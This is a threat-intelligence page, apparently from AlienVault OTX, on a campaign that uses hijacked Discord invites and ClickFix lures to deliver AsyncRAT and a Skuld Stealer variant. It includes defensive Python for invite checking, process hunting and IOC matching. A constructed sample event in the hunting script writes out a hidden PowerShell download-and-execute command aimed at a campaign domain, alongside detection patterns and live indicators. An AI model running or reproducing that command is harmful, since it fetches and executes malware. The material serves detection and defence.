From Trust to Threat: Hijacked Discord Invites Used for Multi-Stage Malware Delivery

Medium
Published: Fri Jun 13 2025 (06/13/2025, 14:47:04 UTC)
Source: AlienVault OTX General

Description

Check Point Research uncovered a malware campaign exploiting expired Discord invite links to redirect users to malicious servers. The attackers use a combination of techniques including ClickFix phishing, multi-stage loaders, and time-based evasions to deliver AsyncRAT and a customized Skuld Stealer targeting crypto wallets. The campaign leverages trusted cloud services for payload delivery and data exfiltration to avoid detection. The operation continues to evolve, with threat actors now able to bypass Chrome's App Bound Encryption using adapted tools like ChromeKatz to steal cookies from new Chromium browser versions. The campaign highlights how subtle features in Discord's invite system can be exploited as attack vectors.

AI-Powered Analysis

Last updated: 06/13/2025, 20:49:45 UTC

Technical Analysis

The campaign documented by Check Point Research under the title "From Trust to Threat: Hijacked Discord Invites Used for Multi-Stage Malware Delivery" is a multi-stage malware distribution operation built on reused Discord invite links. A Discord invite code that has expired or been deleted can be registered again, so a code that once led to a legitimate community, and is still embedded in old forum posts, websites and social media, can later resolve to a server the attacker controls. Victims who follow such a link are not visiting an unfamiliar domain; they are following a link they or their community once trusted.

On the attacker's server the victim is steered to a fake verification step (the captchaguard.me URL among the indicators below is consistent with this stage). This is a ClickFix lure: the page places a command on the clipboard and instructs the user to paste it into the Windows Run dialog, so the user, not an exploit, launches the first stage. The subsequent stages are multi-stage loaders that use time-based evasion (delays and timing checks intended to outlast automated sandbox analysis) before fetching the final payloads. Those payloads are AsyncRAT, a remote access trojan that gives the operator broad control of the host, and a customized Skuld Stealer variant that targets cryptocurrency wallet data. Payload hosting and data exfiltration go through trusted cloud services, so the resulting traffic blends with legitimate use of those services and is not caught by simple reputation-based blocking.

The operation has since gained the ability to defeat Chrome's App Bound Encryption, the feature that ties the key protecting stored cookies to the browser itself so that other processes on the host cannot simply decrypt the cookie store. The attackers use an adapted build of ChromeKatz, which reads cookies from the memory of the running browser process, where they are already decrypted, and therefore keeps working against current Chromium-based releases. Stolen session cookies let the operator take over authenticated web sessions without knowing the password or completing MFA.

Indicators of compromise include file hashes, two IP addresses and the domains captchaguard.me and microads.top, listed below. The campaign is ongoing and continues to adapt, so the indicators should be treated as a snapshot rather than a complete description of the infrastructure.
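The hijack works because the invite code outlives the server it was created for. The check below, added here as an example and not code from Check Point's report or from Discord, re-resolves invite codes an organisation has published and compares the result with the server they originally pointed to. It assumes the team recorded the guild id when each invite was shared (the PINNED_INVITES table, the guild ids and the responses are all constructed), and it mirrors the shape of Discord's public invite lookup (GET https://discord.com/api/v10/invites/{code}, which returns a guild object for a live code and error code 10006 "Unknown Invite" with HTTP 404 once the code no longer exists). The HTTP request itself is left to the caller so the check runs offline.

```python
import json

# Added example; not Check Point's or Discord's code. Guild ids and responses are constructed.
# Hypothetical record of invite codes we published and the guild (server) id each led to.
PINNED_INVITES = {
    "ourcommunity": "100000000000000001",   # vanity invite for our server
    "aB3dE9f":      "100000000000000002",   # ordinary timed invite we once posted
}

# Constructed responses shaped like Discord's GET /api/v10/invites/{code} reply.
SAMPLE_OK = json.dumps({"code": "ourcommunity",
                        "guild": {"id": "100000000000000001", "name": "Our Community"}})
SAMPLE_HIJACKED = json.dumps({"code": "ourcommunity",
                              "guild": {"id": "999999999999999999", "name": "Verification Required"}})
SAMPLE_GONE = json.dumps({"message": "Unknown Invite", "code": 10006})


def classify_invite(code: str, status: int, body: str) -> dict:
    """Compare what an invite code resolves to now with the guild it originally pointed to."""
    expected = PINNED_INVITES.get(code)
    if expected is None:
        return {"code": code, "verdict": "unknown-code",
                "detail": "no pinned guild for this code; nothing to compare against"}
    data = json.loads(body) if body else {}
    if status == 404 or data.get("code") == 10006:
        # The code is no longer bound to any server. Every copy of the link still published
        # is a dangling reference that a third party can later point elsewhere.
        return {"code": code, "verdict": "dangling",
                "detail": "invite no longer resolves; remove or replace published copies"}
    guild = data.get("guild") or {}
    actual = guild.get("id")
    if actual == expected:
        return {"code": code, "verdict": "ok", "detail": f"still resolves to guild {actual}"}
    # Same code, different server: exactly the hijack the campaign relies on.
    return {"code": code, "verdict": "hijacked",
            "detail": f"now resolves to guild {actual} ({guild.get('name')!r}); expected {expected}"}


def run_checks(observations):
    """observations: iterable of (code, http_status, body) tuples from re-resolving each code."""
    return [classify_invite(c, s, b) for c, s, b in observations]


if __name__ == "__main__":
    for r in run_checks([("ourcommunity", 200, SAMPLE_OK),
                         ("ourcommunity", 200, SAMPLE_HIJACKED),
                         ("aB3dE9f", 404, SAMPLE_GONE)]):
        print(r["verdict"].upper(), r["code"], "-", r["detail"])
```

A "dangling" result deserves the same response as a "hijacked" one: the published link must be replaced, because the window between expiry and re-registration is exactly what the attackers exploit.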

Potential Impact

For European organizations the campaign is most relevant where employees or users actively use Discord and Chromium-based browsers. The targeted theft of cryptocurrency wallet data threatens financial assets directly, which matters most for fintech companies, cryptocurrency exchanges and individuals managing digital assets. Because payloads and exfiltrated data travel through trusted cloud services, reputation-based blocking and coarse egress filtering are unlikely to catch the traffic, which raises the chance that a breach succeeds and goes unnoticed. The ability to defeat Chrome's App Bound Encryption and steal browser cookies enables session hijacking of corporate web applications; a stolen cookie represents a session that has already passed MFA, so it also gives the attacker a foothold for lateral movement into SaaS and identity-linked systems. Initial compromise through a hijacked Discord invite and a ClickFix lure lands AsyncRAT on the endpoint, from which data theft, intellectual property loss and disruption of business operations can follow. The multi-stage loaders and time-based evasion mean signature-based defenses alone will often miss the infection, increasing the risk of a prolonged undetected presence. Overall, the campaign can affect the confidentiality, integrity and availability of organizational data and systems, with associated financial and reputational damage.

Mitigation Recommendations

1. Implement advanced email and messaging security controls that detect and block phishing, including lures delivered through social platforms such as Discord.
2. Educate employees and users about expired or reused Discord invite links, and about ClickFix specifically: no legitimate verification page asks the user to paste a command into the Windows Run dialog or a terminal. Treat old invite links in published material as untrusted and re-verify that they still point to the expected server.
3. Deploy endpoint detection and response (EDR) tools that expose process lineage and command lines, and alert on the ClickFix pattern: powershell.exe, mshta.exe or cmd.exe spawned by explorer.exe with a hidden window, an encoded or download-and-execute command line, or a reference to a known campaign domain. Enable PowerShell Script Block Logging so the decoded stages are recorded. Hunt for follow-on behavior consistent with AsyncRAT and Skuld Stealer.
4. Monitor network traffic for connections to the domains and IPs associated with this campaign (e.g., captchaguard.me, microads.top) and block them at the firewall or proxy.
5. Enforce browser security policies, including restricting extensions and plugins, and keep Chromium-based browsers updated to the latest release.
6. Stolen cookies represent sessions that have already completed authentication, so MFA alone does not stop session hijacking. Shorten session lifetimes for critical web applications, bind sessions to the client or device where the platform supports it, and revoke all sessions for users on hosts confirmed infected. MFA still matters for the passwords the stealer collects.
7. Conduct regular threat hunting exercises using the indicators of compromise below and behavioral indicators of AsyncRAT, Skuld Stealer and ChromeKatz activity.
8. Because the campaign stages payloads and exfiltrates data through trusted cloud services, do not rely on domain reputation alone: inspect or proxy traffic to cloud storage and paste services, restrict which such services endpoints may reach, and alert on unusual upload volumes from workstations.
9. Implement network segmentation to contain infections and reduce lateral movement opportunities.
10. Report hijacked invite links and malicious infrastructure to Discord and the cloud service providers involved so they can be taken down promptly.
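Items 3 and 7 come down to telemetry: a ClickFix infection starts with the victim pasting a command into the Run dialog, so the first-stage interpreter is a child of explorer.exe carrying a download-and-execute command line. The scoring below is an added example, not a Check Point or AlienVault rule. It assumes process-creation events that carry ParentImage, Image and CommandLine, as Sysmon Event ID 1 or an EDR provides; the events are constructed for the example and the campaign domains are the ones listed on this page.

```python
import re

# Added example; not Check Point's or AlienVault's code. Events below are constructed.

# Interpreters that ClickFix lures typically have the victim paste into the Run dialog.
LOLBIN_CHILDREN = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe", "cscript.exe"}

# Command-line fragments that point to a download-and-execute stage rather than admin scripting.
SUSPICIOUS = [
    r"-w(?:indowstyle)?\s+hidden",
    r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}",
    r"-ep\s+bypass|-executionpolicy\s+bypass",
    r"\biex\b|invoke-expression",
    r"downloadstring|invoke-webrequest|\biwr\b|\bcurl\b",
    r"mshta\s+https?://",
]
CAMPAIGN_DOMAINS = {"captchaguard.me", "microads.top"}   # from this pulse's indicators


def score_event(ev: dict):
    """Return (score, reasons) for one process-creation event."""
    reasons = []
    parent = ev["ParentImage"].rsplit("\\", 1)[-1].lower()
    image = ev["Image"].rsplit("\\", 1)[-1].lower()
    cmd = ev["CommandLine"]
    if image not in LOLBIN_CHILDREN:
        return 0, reasons
    score = 0
    if parent == "explorer.exe":               # Run dialog pastes are spawned by explorer.exe
        score += 2
        reasons.append("interpreter spawned from explorer.exe (Run dialog or double-click)")
    for pat in SUSPICIOUS:
        if re.search(pat, cmd, re.IGNORECASE):
            score += 2
            reasons.append(f"command line matches /{pat}/")
    for d in CAMPAIGN_DOMAINS:
        if d in cmd.lower():
            score += 5
            reasons.append(f"references campaign domain {d}")
    return score, reasons


def hunt(events, threshold=4):
    """Return events scoring at or above threshold, oldest first, ready for triage."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append({"host": ev["Computer"], "score": score,
                         "reasons": reasons, "cmd": ev["CommandLine"]})
    return hits


# Constructed sample: one ClickFix PowerShell stage, two legitimate PowerShell uses,
# one mshta stage and one unrelated process.
SAMPLE_EVENTS = [
    {"Computer": "WS-01", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden -c \"iex ((New-Object Net.WebClient)"
                    ".DownloadString('https://captchaguard.me/?key='))\""},
    {"Computer": "WS-02", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -NoProfile -File C:\Users\bob\scripts\rename_photos.ps1"},
    {"Computer": "SRV-01", "ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -ExecutionPolicy Bypass -File C:\ProgramData\Backup\nightly.ps1"},
    {"Computer": "WS-03", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://microads.top/"},
    {"Computer": "WS-02", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe"},
]

if __name__ == "__main__":
    for h in hunt(SAMPLE_EVENTS):
        print(h["host"], h["score"], h["cmd"])
        for r in h["reasons"]:
            print("   -", r)
```

The explorer.exe parent alone scores below the threshold on purpose: users legitimately launch scripts from the shell, and the signal is the combination of that parent with a hidden window, an encoded or download-and-execute command line, or a known bad domain. Tune the threshold against your own baseline before alerting on it.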


Technical Details

Author: AlienVault
TLP: WHITE
References: https://research.checkpoint.com/2025/from-trust-to-threat-hijacked-discord-invites-used-for-multi-stage-malware-delivery
Adversary: none recorded
Pulse Id: 684c39e8dd56f16d5a6349bc
Threat Score: none recorded

Indicators of Compromise

Hash (algorithm inferred from digest length; the pulse supplies no per-indicator descriptions)

MD5
7834b9b4574b68ba85eabd79b9770b08
fc13b02d22f6fe582e2948259660e3d5

SHA-1
4501e8029fedadab2cbaa9e504301200c4cd2bfe
d383b44cb3c7e5a2e460300182d89932869a7281

SHA-256
160eda7ad14610d93f28b7dee20501028c1a9d4f5dc0437794ccfc2604807693
375fa2e3e936d05131ee71c5a72d1b703e58ec00ae103bbea552c031d3bfbdbe
53b65b7c38e3d3fca465c547a8c1acc53c8723877c6884f8c3495ff8ccc94fbe
5d0509f68a9b7c415a726be75a078180e3f02e59866f193b0a99eee8e39c874f
670be5b8c7fcd6e2920a4929fcaa380b1b0750bfa27336991a483c0c0221236a
673090abada8ca47419a5dbc37c5443fe990973613981ce622f30e83683dc932
8135f126764592be3df17200f49140bfb546ec1b2c34a153aa509465406cb46c
d54fa589708546eca500fbeea44363443b86f2617c15c8f7603ff4fb05d494c1
db1aa52842247fc3e726b339f7f4911491836b0931c322d1d2ab218ac5a4fb08
ef8c2f3c36fff5fccad806af47ded1fd53ad3e7ae22673e28e541460ff0db49c
f08676eeb489087bc0e47bd08a3f7c4b57ef5941698bc09d30857c650763859c

Ip

101.99.76.120
87.120.127.37

Url

https://captchaguard.me/?key=

Domain

captchaguard.me
microads.top
request.open (likely a scraper artefact: it matches the XMLHttpRequest.open method name rather than a host observed in the campaign; verify before adding it to a blocklist)
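Indicator lists pasted from a pulse need normalising before they go into a blocklist or a hunt: the hashes above mix MD5, SHA-1 and SHA-256, the URL carries a host that belongs in the domain set, and one domain entry looks like a scraper artefact. The script below is an added example, not AlienVault's or Check Point's tooling. It buckets this pulse's indicators by type, holds back entries that need an analyst's review, defangs values for sharing, and runs the rest over a handful of constructed proxy, DNS, firewall and EDR log lines.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Added example; not part of the pulse or Check Point's tooling.
# Indicator values are the ones listed in this pulse; log lines below are constructed.
RAW_IOCS = {
    "hash": [
        "7834b9b4574b68ba85eabd79b9770b08", "fc13b02d22f6fe582e2948259660e3d5",
        "4501e8029fedadab2cbaa9e504301200c4cd2bfe", "d383b44cb3c7e5a2e460300182d89932869a7281",
        "160eda7ad14610d93f28b7dee20501028c1a9d4f5dc0437794ccfc2604807693",
        "375fa2e3e936d05131ee71c5a72d1b703e58ec00ae103bbea552c031d3bfbdbe",
        "53b65b7c38e3d3fca465c547a8c1acc53c8723877c6884f8c3495ff8ccc94fbe",
        "5d0509f68a9b7c415a726be75a078180e3f02e59866f193b0a99eee8e39c874f",
        "670be5b8c7fcd6e2920a4929fcaa380b1b0750bfa27336991a483c0c0221236a",
        "673090abada8ca47419a5dbc37c5443fe990973613981ce622f30e83683dc932",
        "8135f126764592be3df17200f49140bfb546ec1b2c34a153aa509465406cb46c",
        "d54fa589708546eca500fbeea44363443b86f2617c15c8f7603ff4fb05d494c1",
        "db1aa52842247fc3e726b339f7f4911491836b0931c322d1d2ab218ac5a4fb08",
        "ef8c2f3c36fff5fccad806af47ded1fd53ad3e7ae22673e28e541460ff0db49c",
        "f08676eeb489087bc0e47bd08a3f7c4b57ef5941698bc09d30857c650763859c",
    ],
    "ip": ["101.99.76.120", "87.120.127.37"],
    "url": ["https://captchaguard.me/?key="],
    "domain": ["captchaguard.me", "microads.top", "request.open"],
}

HASH_ALGO = {32: "md5", 40: "sha1", 64: "sha256"}
# Analyst-maintained list of "domains" that are really code identifiers picked up by a scraper.
SCRAPER_ARTIFACTS = {"request.open"}


def normalize(raw):
    """Bucket hashes by algorithm, fold URL hosts into the domain set, park dubious entries."""
    out = {"md5": set(), "sha1": set(), "sha256": set(), "ip": set(), "domain": set(), "review": []}
    for h in raw["hash"]:
        h = h.strip().lower()
        algo = HASH_ALGO.get(len(h))
        if algo is None or not re.fullmatch(r"[0-9a-f]+", h):
            out["review"].append((h, "not a recognised hex digest"))
            continue
        out[algo].add(h)
    for ip in raw["ip"]:
        try:
            out["ip"].add(str(ipaddress.ip_address(ip.strip())))
        except ValueError:
            out["review"].append((ip, "not a valid IP address"))
    for u in raw["url"]:
        out["domain"].add(urlsplit(u).hostname.lower())   # the host is what proxies and DNS see
    for d in raw["domain"]:
        d = d.strip().lower()
        if d in SCRAPER_ARTIFACTS:
            out["review"].append((d, "matches a JavaScript method name; verify before blocking"))
        else:
            out["domain"].add(d)
    return out


def defang(value: str) -> str:
    """Render an indicator so it cannot be clicked or auto-linked when shared."""
    return value.replace("http", "hxxp").replace(".", "[.]")


def match_logs(iocs, lines):
    """Return (type, indicator, line) for every log line containing a normalised indicator."""
    hits = []
    for line in lines:
        low = line.lower()
        for d in iocs["domain"]:
            # Allow a leading "." so subdomains match; forbid other label characters around it.
            if re.search(r"(?<![\w-])" + re.escape(d) + r"(?![\w-])", low):
                hits.append(("domain", d, line))
        for ip in iocs["ip"]:
            if re.search(r"(?<![\d.])" + re.escape(ip) + r"(?![\d.])", line):
                hits.append(("ip", ip, line))
        for length, algo in HASH_ALGO.items():
            for h in re.findall(r"\b[0-9a-f]{%d}\b" % length, low):
                if h in iocs[algo]:
                    hits.append((algo, h, line))
    return hits


# Constructed log lines: two true hits on domains, one on an IP, one on a file hash,
# plus two near misses (the parked "request.open" entry and a longer, unrelated IP).
SAMPLE_LOGS = [
    "2025-06-13T14:47:04Z proxy WS-01 alice GET https://captchaguard.me/?key= 200",
    "2025-06-13T14:47:09Z dns WS-01 query cdn.microads.top IN A",
    "2025-06-13T14:47:31Z fw WS-01 -> 87.120.127.37:443 allow",
    "2025-06-13T14:48:00Z proxy WS-02 bob GET https://example.com/request.open 200",
    r"2025-06-13T15:02:11Z edr WS-01 created C:\Users\alice\AppData\Local\Temp\setup.exe "
    "sha256=160eda7ad14610d93f28b7dee20501028c1a9d4f5dc0437794ccfc2604807693",
    "2025-06-13T15:05:00Z fw WS-02 -> 187.120.127.37:443 allow",
]

if __name__ == "__main__":
    iocs = normalize(RAW_IOCS)
    for kind, value, line in match_logs(iocs, SAMPLE_LOGS):
        print(kind, defang(value), "<-", line)
    for value, why in iocs["review"]:
        print("REVIEW", defang(value), "-", why)
```

The hash scan relies on word boundaries, so a 64-character digest is never mistaken for an MD5 sitting inside it; the IP and domain patterns reject neighbouring digits and label characters for the same reason. Entries on the review list never reach a blocklist until someone confirms them.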

Threat ID: 684c8b50a8c921274380ebb9

Added to database: 6/13/2025, 8:34:24 PM

Last enriched: 6/13/2025, 8:49:45 PM

Last updated: 6/15/2025, 1:56:27 PM

